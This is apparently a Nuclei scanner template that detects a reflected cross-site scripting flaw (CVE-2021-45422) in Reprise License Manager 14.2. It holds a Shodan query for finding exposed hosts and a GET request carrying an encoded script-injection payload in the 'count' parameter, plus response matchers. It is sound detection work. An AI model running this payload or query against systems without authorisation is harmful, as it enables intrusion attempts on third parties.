51 lines
1.5 KiB
YAML
51 lines
1.5 KiB
YAML
id: CVE-2021-45422
|
|
|
|
info:
|
|
name: Reprise License Manager 14.2 - Cross-Site Scripting
|
|
author: edoardottt
|
|
severity: medium
|
|
description: |
|
|
Reprise License Manager 14.2 contains a cross-site scripting vulnerability in the /goform/activate_process "count" parameter via GET.
|
|
reference:
|
|
- https://seclists.org/fulldisclosure/2022/Jan/31
|
|
- https://www.getinfosec.news/13202933/reprise-license-manager-142-reflected-cross-site-scripting#/
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-45422
|
|
- http://reprise.com
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2021-45422
|
|
cwe-id: CWE-79
|
|
cpe: cpe:2.3:a:reprisesoftware:reprise_license_manager:*:*:*:*:*:*:*:*
|
|
epss-score: 0.00247
|
|
metadata:
|
|
max-request: 1
|
|
shodan-query: http.html:"Reprise License"
|
|
verified: true
|
|
tags: cve,cve2021,reprise,xss,seclists
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/goform/activate_process?isv=&akey=&hostid=&count=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- 'value=""><script>alert(document.domain)</script>"><input type='
|
|
- 'value: "><script>alert(document.domain)</script>)<br>'
|
|
condition: or
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "text/html"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# Enhanced by mp on 2022/08/28
|